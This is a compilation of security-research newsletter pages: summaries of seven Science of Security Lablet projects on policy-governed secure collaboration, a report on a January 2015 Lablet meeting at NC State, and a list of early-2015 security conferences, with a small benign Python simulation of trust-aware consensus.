Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Lablet Research on Policy-Governed Secure Collaboration

Policy-Governed Secure Collaboration


EXECUTIVE SUMMARY: Over the past year, the NSA Science of Security Lablets engaged in 7 NSA-approved research projects addressing the hard problem of Policy-Governed Secure Collaboration. All of the work done against this hard problem addressed other hard problems as well. UIUC's research involved other universities, including the Illinois Institute of Technology, USC, UPenn, and Dartmouth. The projects are in various stages of maturity, and several have led to publications and/or conference presentations. Summaries of the projects, highlights, and publications are presented below.

1. Geo-Temporal Characterization of Security Threats (CMU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Resilient Architectures; provides an empirical basis for assessment and validation of security models; provides a global model of flow of threats and associated information.

HIGHLIGHTS and PUBLICATIONS:

  • Technical Report submitted
  • Identified central core network
  • Identified, by type of attack, the key actors attacking the country of interest and those being attacked by it
  • Technical Report: Ghita Mezzour, L. Richard Carley, Kathleen M. Carley, 2014, Global Mapping of Cyber Attacks, School of Computer Science, Institute for Software Research, Technical Report CMU-ISR-14-111

2. Scientific Understanding of Policy Complexity (NCSU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Human Behavior

  • Policy-Governed Secure Collaboration: Security policies can be very complex, and the same policy can be expressed in ways of differing complexity. It is desirable to have a scientific understanding of how to measure the complexity of a policy and of a policy encoding. Part of this work includes breaking down complex vulnerabilities into their constituent parts.
  • Human Behavior: Our notion of policy complexity is based on how easy it is for humans to understand and write policies; there is thus a human behavior aspect to it.

HIGHLIGHTS and PUBLICATIONS:

  • In an effort to break down complex policies, we have investigated ways to break down MITRE's Common Weakness Enumeration (CWE), including experimenting with the Protege taxonomy tool (http://protege.stanford.edu/). The most fruitful route appears to be to take each vulnerability (there are about 1,000), extract one or more code samples from it, and tag them using Protege. This will give an idea of which concepts are necessary to understand the vulnerability.

3. Formal Specification and Analysis of Security-Critical Norms and Policies (NCSU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Scalability and Composability

  • Policy-Governed Secure Collaboration: This project addresses how to specify and analyze norms (standards of correct collaborative behavior) and policies (ways of achieving different collaborative behaviors) to determine important properties, such as their mutual consistency.
  • Scalability and Composability: This project can facilitate the composition of new collaborative systems by combining sets of norms and policies, and verifying whether such combinations satisfy desired properties.

HIGHLIGHTS and PUBLICATIONS:

  • We are addressing our first research hypothesis: that norm and preference specification languages can be constructed that both adequately express typical collaboration scenarios and enable tractable checking of consistency, composability, and realizability via policies.
  • We have introduced a new notion of accountability, formulated in normative terms, which will provide a connection between norms and policies and security properties, especially in the academic IT domain.
  • We are formulating the problems of consistency and realizability in mathematical terms, with a view toward producing criteria for designing algorithms for the consistency and realizability of norms, policies, and preferences. To this end, we are investigating whether a set of norms is consistent and realizable through the policies and preferences of the collaborators, and whether a set of norms achieves specified security properties, with reference to the healthcare domain.
  • Amit K. Chopra and Munindar P. Singh, The Thing Itself Speaks: Accountability as a Foundation for Requirements in Sociotechnical Systems, Proceedings of the IEEE International Workshop on Requirements Engineering and Law (RELAW), Extended Abstract, Karlskrona, Sweden, IEEE Computer Society, 2014.

4. Understanding Effects of Norms and Policies on the Robustness, Liveness, and Resilience of Systems (NCSU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Resilient Architectures

  • Policy-Governed Secure Collaboration: Norms provide a standard of correctness for collaborative behavior, with respect to which policies of the participants can be evaluated individually or in groups.
  • Resilient Architectures: The study of robustness and resilience of systems modeled in terms of norms would provide a basis for understanding resilient social architectures.

HIGHLIGHTS and PUBLICATIONS:

  • We have developed prototype multiagent systems of simple structure on which to build more complex simulations of the effects of norms and policies on system properties.
  • We have developed a simplified model of an academic security setting that identifies the main stakeholders, norms that promote security, and internal policies by which parties may autonomously decide whether to comply with different norms. We have realized this model in our multiagent simulation framework and are using it not only to refine our understanding of the robustness, liveness, and resilience of norms as they pertain to security, but also as a basis for understanding the requirements on a sufficiently expressive simulation framework.

5. A Hypothesis Testing Framework for Network Security (UIUC and Illinois Institute of Technology)

SUMMARY: Addresses four hard problems:

  • Scalability and Composability
  • Policy-Governed Secure Collaboration
  • Predictive Security Metrics
  • Resilient Architectures

HIGHLIGHTS and PUBLICATIONS:

  • A key part of our strategy is to test hypotheses within a model of a live network. We continued our work on the foundational rigorous network model along three dimensions: 1) network behavior under timing uncertainty, 2) modeling of virtualized networks, and 3) a database model of network behavior.
  • Our workshop paper on modeling virtualized networks received the best paper award at HotSDN 2014.
  • Soudeh Ghorbani and Brighten Godfrey, "Towards Correct Network Virtualization", ACM Workshop on Hot Topics in Software Defined Networks (HotSDN), August 2014.
  • Dong Jin and Yi Ning, "Securing Industrial Control Systems with a Simulation-based Verification System", 2014 ACM SIGSIM Conference on Principles of Advanced Discrete Simulation, Denver, CO, May 2014 (Work-in-Progress Paper)

6. Science of Human Circumvention of Security (UIUC, USC, UPenn, Dartmouth)

SUMMARY: Our project most closely aligns with hard problem 5 (Understanding and Accounting for Human Behavior). However, it also pertains to problems 1 (Scalability and Composability), 2 (Policy-Governed Secure Collaboration), and 3 (Predictive Security Metrics).

  • Scalability and Composability: We want to understand not just the drivers of individual incidents of human circumvention, but also the net effect of these incidents. Included here are measures of the environment (physical, organizational, hierarchical, and embeddedness within larger systems).
  • Policy-Governed Secure Collaboration: In order to create policies that actually enable secure collaboration among users in varying domains, we need to understand and predict the de facto consequences of policies, not just the de jure ones.
  • Security-Metrics-Driven Evaluation, Design, Development, and Deployment: Making sane decisions about which security controls to deploy requires understanding the de facto consequences of those deployments, instead of pretending that circumvention by honest users never happens.

HIGHLIGHTS and PUBLICATIONS:

  • Via fieldwork in real-world enterprises, we have been identifying and cataloging the types and causes of circumvention by well-intentioned users. We are using help desk logs, records of security-related computer changes, analysis of user behavior in situ, and surveys, in addition to interviews and observations. We then began to build and validate models of usage and circumvention behavior, for individuals and then for populations within an enterprise.
  • The JAMIA paper by Smith and Koppel on usability problems with health IT (pre-SHUCS, but related) received another accolade, this time from the International Medical Informatics Association, which named it one of the best papers of 2014. We are updating that paper to include discoveries from our analysis of the workaround corpora described above.
  • J. Blythe, R. Koppel, V. Kothari, and S. Smith. "Ethnography of Computer Security Evasions in Healthcare Settings: Circumvention as the Norm". HealthTech '14: Proceedings of the 2014 USENIX Summit on Health Information Technologies, August 2014. Abstract: Healthcare professionals have unique motivations, goals, perceptions, training, tensions, and behaviors, which guide workflow and often lead to unprecedented workarounds that weaken the efficacy of security policies and mechanisms. Identifying and understanding these factors that contribute to circumvention, as well as the acts of circumvention themselves, is key to designing, implementing, and maintaining security subsystems that achieve security goals in healthcare settings. To this end, we present our research on workarounds to computer security in healthcare settings that do not compromise fundamental health goals. We argue and demonstrate that understanding workarounds to computer security, especially in medical settings, requires not only analyses of computer rules and processes, but also interviews and observations with users and security personnel. In addition, we discuss the value of shadowing clinicians and conducting focus groups with them to understand their motivations and tradeoffs for circumvention. Ethnographic investigation of workflow is paramount to achieving security objectives. (This publication addresses Problems 5, 1, 2, and 3.)
  • R. Koppel. "Software Loved by its Vendors and Disliked by 70% of its Users: Two Trillion Dollars of Healthcare Information Technology's Promises and Disappointments". HealthTech '14: Keynote talk at the 2014 USENIX Summit on Health Information Technologies, August 2014. (This keynote talk addresses Problem 5.)
  • R. Koppel, J. Blythe, and S. Smith. "Ethnography of Computer Security Evasions in Healthcare Organizations: Circumvention of Cyber Controls". Talk at the European Sociological Association Midterm Conference, August 2014. (This talk addresses Problems 5 and 3.)

7. Trust, Recommendation Systems and Collaboration (UMD)

SUMMARY: Addresses Policy-Governed Secure Collaboration; Scalability and Composability, and Understanding and Accounting for Human Behavior

HIGHLIGHTS and PUBLICATIONS:

  • Our goal is to develop a transformational framework for a science of trust, and its impact on local policies for collaboration, in networked multi-agent systems. The framework will take human behavior into account from the start by treating humans as integrated components of these networks, interacting dynamically with other elements. The new analytical framework will be integrated, and validated, with empirical methods of analyzing experimental data on trust, recommendation, and reputation from several datasets available to us, in order to capture fundamental trends and patterns of human behavior, including trust and mistrust propagation, confidence in trust, phase transitions in the dynamic graph models involved in the new framework, and the stability or instability of collaborations.
  • We developed new algorithms that effectively and provably use trust in distributed consensus problems in the presence of adversaries. Such problems are of interest in distributed fusion in sensor networks. We showed that a trust mechanism allows correct consensus to occur in cases where, without it, consensus would not be possible. (A simplified illustration of trust-weighted consensus appears after this list.)
  • We developed new mathematical models for networks that carry opinions (beliefs) in their nodes, while the interaction between the nodes (agents) can be positive (friends) or negative (enemies). We analyzed the dynamics of belief evolution and emergence in such signed networks and discovered new laws governing these dynamics.
  • We developed a novel model and an efficient solution algorithm to the so called "Advertisement Allocation Problem" in large social networks, using a new and innovative embedding of the graph in hyperbolic space. The new algorithm obtains the same results as other algorithms albeit with complexity lower by two orders of magnitude.
  • We demonstrated how physical layer security schemes can be successfully employed to create a trusted core and provide privacy protection in distributed control and inference schemes.
  • We investigated several problems in crowdsourcing, by developing novel methods and algorithms that can handle multiple domains of knowledge, multi-dimensional trust in the knowledge of people or experts, and budget constraints. We investigated analytically these problems and obtained new algorithms and results on their performance.
  • X. Liu and J.S. Baras, "Using Trust in Distributed Consensus With Adversaries in Sensor and Other Networks," invited paper, Proceedings of the 17th International Conference on Information Fusion (FUSION 2014), Salamanca, Spain, July 7-10, 2014. Abstract: Extensive research efforts have been devoted to distributed consensus with adversaries. Many diverse applications drive the increased interest in this area, including distributed collaborative sensor networks, sensor fusion, and distributed collaborative control. We consider the problem of detecting Byzantine adversaries in a network of agents with the goal of reaching consensus. We propose a novel trust model that establishes both local trust based on local evidence and global trust based on local exchange of local trust values. We describe a trust-aware consensus algorithm that integrates the trust evaluation mechanism into the traditional consensus algorithm, and we propose various local decision rules based on local evidence. To further enhance the robustness of trust evaluation itself, we also provide a trust propagation scheme that takes into account the evidence of other nodes in the network. The algorithm is flexible and extensible, accommodating more complicated designs of decision rules and trust models. We then show by simulation that the trust-aware consensus algorithm can effectively detect Byzantine adversaries and exclude them from consensus iterations, even in sparse networks. These results can be applied to the fusion of trust evidence as well as to sensor fusion when malicious sensors are present, as, for example, in power grid sensing and monitoring.
  • J.S. Baras gave the following invited keynote lecture on the topics, approach, and results of this task: J.S. Baras, "Security and Trust in a Networked Immersed World: From Components to Systems and Beyond," invited keynote lecture, Workshop on Security and Safety: Issues, Concepts and Ideas, 2nd Hellenic Forum for Science, Innovation and Technology, Demokritos Research Center, Athens, Greece, June 30 - July 4, 2014.
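
As referenced above, the following sketch gives one toy rendering of trust-aware consensus: honest agents iteratively average reported values, weighting each neighbor by a trust score that collapses once the neighbor's reports deviate far from the local median. The update rule, deviation test, and all constants are our own illustrative choices, not the algorithm of Liu and Baras.

```python
# Toy trust-aware average consensus -- illustrative only, not the Liu-Baras
# algorithm. Byzantine nodes report a fixed bogus value; honest nodes zero out
# trust in any neighbor whose report sits far from the local median.
import statistics

def trust_aware_consensus(values, byzantine, rounds=50, step=0.3, tol=2.0):
    n = len(values)
    x = list(values)
    trust = [[1.0] * n for _ in range(n)]       # trust[i][j]: i's trust in j

    for _ in range(rounds):
        reported = [100.0 if j in byzantine else x[j] for j in range(n)]
        med = statistics.median(reported)
        for i in range(n):
            if i in byzantine:
                continue
            for j in range(n):                  # local evidence: outliers lose trust
                if abs(reported[j] - med) > tol:
                    trust[i][j] = 0.0
            total = sum(trust[i])
            if total > 0:
                avg = sum(t * r for t, r in zip(trust[i], reported)) / total
                x[i] += step * (avg - x[i])     # move toward the trusted average
    return [x[i] for i in range(n) if i not in byzantine]

print(trust_aware_consensus([1.0, 2.0, 3.0, 4.0], byzantine={3}))
# Honest nodes converge to ~2.0, the honest average, instead of being
# dragged toward the adversary's 100.0.
```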

(ID#: 14-3365)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


SoS Lablet Quarterly Meeting - NCSU

SoS Lablet Quarterly Meeting - NCSU


Raleigh, NC -- January 29, 2015

Lablet researchers meet at NC State to exchange and advance research and ideas about the Science of Security

The quarterly Science of Security Lablet meeting, sponsored by NSA, was hosted by the Lablet at North Carolina State University on January 27 and 28, 2015. Quarterly meetings are held to share research, coordinate, present interim findings, and stimulate thought and discussion about the Science of Security. Laurie Williams, Principal Investigator at NC State, organized the series of talks and discussions about technical and behavioral aspects of cybersecurity.

Members of the Research Directorate at NSA, the program's sponsor, began the talks. Orville Stockland, Special Assistant for Novel Research Partnership Strategies, Trusted Systems Research Group, greeted the assembled researchers and encouraged them both to share the results of their research throughout the community and to make their students aware of the many government resources available to them online. Stephanie Yannacci, Science of Security Program Manager, provided an SoS program update and described the core elements of the Science of Security Program, noting how the Lablets, the HOT SoS conference, the annual paper competition, and the CPS-VO web page mesh to offer communication and information sharing among the members of the Science of Security community. Stuart Krohn, SoS Technical Director, described the progress the Lablets are making. He relayed a presentation on the Science of Security, based on Thomas Kuhn's "The Structure of Scientific Revolutions," given by Dan Geer at the National Science Foundation's SaTC Principal Investigators' meeting. He noted that NIST, NSF, DHS, and NSA all presented Science of Security briefings to the National Academy of Sciences, and that NSA's work reflected a stricter definition of foundational: basic scientific tenets in the multi-disciplinary areas of security upon which we can base trust. Krohn explained the selection process for the annual best paper award, noted that the SoS Virtual Organization now numbers more than 500 individuals, and observed that sub-Lablet research partners have expanded the SoS community globally.

Pete Loscocco of NSA presented the keynote address, "Integrity Measurement: The Way Ahead, Knowing if Your Systems Have Been Altered." He outlined issues and solutions in the use of integrity measurement as a tool to achieve trusted computing. The broad goal, he stated, is to secure systems, but we are falling short of the ideal: software cannot sufficiently protect systems from attack, and the question of remote trust remains unanswered. Integrity measurement can be useful in bridging the gap between traditional concepts (that a correctly designed and implemented system is "secure") and the reality of network security. Loscocco described prototypes of integrity measurement currently in use and characterized it as a tool that augments existing systems and is useful for detecting trust issues. The larger issue, he said, is that trust decisions require system integrity to preserve trust, and that evidence is required to test trust attestations rooted in trustworthy mechanisms. Using load-time and run-time measurement, the process scales to trust relationships anywhere on the network, can adapt to changing requirements, and can project trust across domains using currently available technologies.

Individual researchers from each Lablet and their teams presented materials from their work addressing the five Hard Problems in cybersecurity. Carnegie Mellon's Lablet presented current research on security risk perception in composable systems and on analyzing highly configurable systems. Preemptive intrusion detection and hypothesis testing for network security were the topics presented by the University of Illinois. Maryland contributed presentations on a trust-aware social recommender system design and on remote voting protocols. Host NC State presented an objective resiliency analysis of smart grid systems and a discussion of systematizing isolation techniques. In addition, 16 research posters were displayed, and NCSU shared its work on bibliometric analysis of Science of Security publications. Jeff Carver of the University of Alabama (working in cooperation with the NCSU Lablet) led an interactive exercise featuring a rubric teams can use to determine whether a specific research paper shows scientific value and rigor.
 

The next quarterly meeting will be held April 21 and 22, 2015, at the University of Illinois Urbana-Champaign, in conjunction with HOT SoS 2015.

(ID#:14-3364)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Upcoming Events

Upcoming Events



Mark your calendars! This section features a wide variety of upcoming security-related conferences, workshops, symposia, competitions, and events happening in the United States and around the world. The list also includes several past events, with links to proceedings or summaries of the actual activities.

Note: The events may also be found on the SoS Calendar, located by clicking the 'Calendar' tab on the left-hand navigation bar.


NEDForum London
This event's topic is "What Can We Learn from the Darknet?", with applications to threat intelligence, attack detection, and commerce. Though the Darknet presents a threat to companies, the law, individuals, and society, some organizations are seeing its profitable side, as Facebook did with its recently opened Darknet site. The conference will feature many speaker sessions and a panel discussion. (ID# 14-70093)
Event Date: Fri 1/30/15
Location: Central London, UK
URL: http://www.nedforum.com/

Suits and Spooks
This event invites security leaders from the public, private, defense, law enforcement, and intelligence sectors to attend and engage in discussion of the most current security challenges. The limited audience makes this conference unique and offers an environment for peers to engage, discuss, network, and debate key issues in cybersecurity. The event will feature workshops, panel discussions, presentations, and more. Issues to be discussed include cryptocurrencies, Ukraine's role in cyberwarfare, the Sony hack, and more. (ID# 14-70094)
Event Date: Wed 2/4/15 - Thurs 2/5/15
Location: Ritz Carlton Hotel, Washington D.C.
URL: http://www.suitsandspooks.com/#!washington-dc-2015/c1c61
ICSS 2015
Organized by the B-CCentre (Belgian Cybercrime Centre of Excellence for Training, Research, and Education) and KU Leuven, this event presents high-level keynote speakers as well as the latest developments and innovations in the field of cybersecurity. Experts from the police, the Cybercrime Centres of Excellence, and European member state magistrates have been invited. (ID# 14-70095)
Event Date: Wed 2/4/15 - Thurs 2/5/15
Location: Leuven, Belgium
URL: https://www.icss2015.eu/

Salt Lake City Tech-Security Conference
This conference invites industry experts and peers to engage with current security issues, including email security, VoIP, LAN security, wireless security, USB drive security, and more. Some 25-30 vendor exhibits will be present, and the conference features speaker sessions, networking opportunities, and giveaways. (ID# 14-70096)
Event Date: Thurs 2/5/15
Location: Salt Lake City, Utah
URL: http://dataconnectors.com/upcoming-events-and-agendas/58-salt-lake-city-tech-security-conference-2015

UK Energy Cyber Security Executive Forum
This event invites CEOs, CISOs, Heads of Digital Risk, CIOs, Chief Risk Officers, and risk personnel to join the discussion about cyber threats to the energy sector. This strategic and practice-driven summit focuses on risk minimization, standards, resiliency, and more. Topics include cybercrime in the oil and gas industry, management of data security breaches, and more. (ID# 14-70097)
Event Date: Thurs 2/5/15
Location: London, England
URL: http://www.cityandfinancialconferences.com/events/the-uk-energy-cyber-security-executive-forum/event-summary-9aafa64a262c40f28f71a18f8cdd0147.aspx?inf_contact_key=5e4aea209b3cbcf6eb197ef83a5d8d28d0066d203429cb176a6adf28999c59c5

ICISSP 2015
The International Conference on Information Systems Security and Privacy invites industry leaders, security researchers, academics, and practitioners to collaborate on the technical and social challenges in privacy and security today. The conference areas are divided into four categories: Data and Software Security; Trust, Privacy and Confidentiality; Mobile Systems Security; and Biometric Authentication. The event will feature keynote speakers, demos, tutorials, paper presentations, and more. (ID# 14-70098)
Event Date: Mon 2/9/15 - Wed 2/11/15
Location: ESEO, Angers, Loire Valley, France
URL: http://www.icissp.org/Home.aspx

2015 Cyber Risk Insights Conference
This event features an expert panel of leaders in network security, regulation, law, risk management, and cyber risk assurance, and it encourages risk managers, CISOs, CROs, underwriters, reinsurers, and other risk professionals to participate in this collaborative learning experience. (ID# 14-70099)
Event Date: Tues 2/10/15
Location: The Willis Building, London, England
URL: http://www.advisenltd.com/events/conferences/2015/02/10/2015-cyber-risk-insights-conference-london/

AFCEA West 2015
This three-day event is known as the premier Sea Services event, with particular interest in Asia-Pacific operations. It will feature emerging systems, platforms, technologies, and networks. Sponsored by SAIC, Oracle, Samsung, Northrop Grumman, and others, the event is free to all military and government personnel. (ID# 14-70100)
Event Date: Tues 2/10/15 - Thurs 2/12/15
Location: San Diego, CA
URL: http://events.jspargo.com/West15/public/enter.aspx

10th Annual ICS Security Summit
This summit is designed as a learning experience, featuring workshops and seminars with industry experts on attacker techniques, testing approaches in ICS, and defense capabilities in ICS environments. The summit will also offer hands-on training courses. (ID# 14-70101)
Event Date: Sun 2/22/15 - Fri 3/2/15
Location: Orlando, FL
URL: http://www.sans.org/event/ics-security-summit-2015

Connected World 2015
In partnership with the University of Alabama at Birmingham's Center for Information Assurance and Joint Forensics Research, this conference invites industry leaders, government, and academia. It will include notable speakers, exhibits, and discussions concerning security and connected devices. (ID# 14-70102)
Event Date: Mon 2/23/15 - Tues 2/24/15
Location: Birmingham Marriott, Alabama
URL: http://connectedworld.com/conference/

BSidesNOLA 2015
Join fellow pentesters and security experts in New Orleans for the BSides NOLA conference. Individuals are invited to present and participate in discussions, demos, conversations, speaker sessions, and more with members of the information security community. This year, Chris Rohlf, who heads penetration testing efforts at Yahoo, will speak on large-scale offensive computer operations. (ID# 14-70103)
Event Date: Sat 5/30/15
Location: Hilton Garden Inn New Orleans Convention Center, New Orleans LA
URL: http://www.securitybsides.com/w/page/91550808/BSidesNOLA

(ID#:14-3362)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.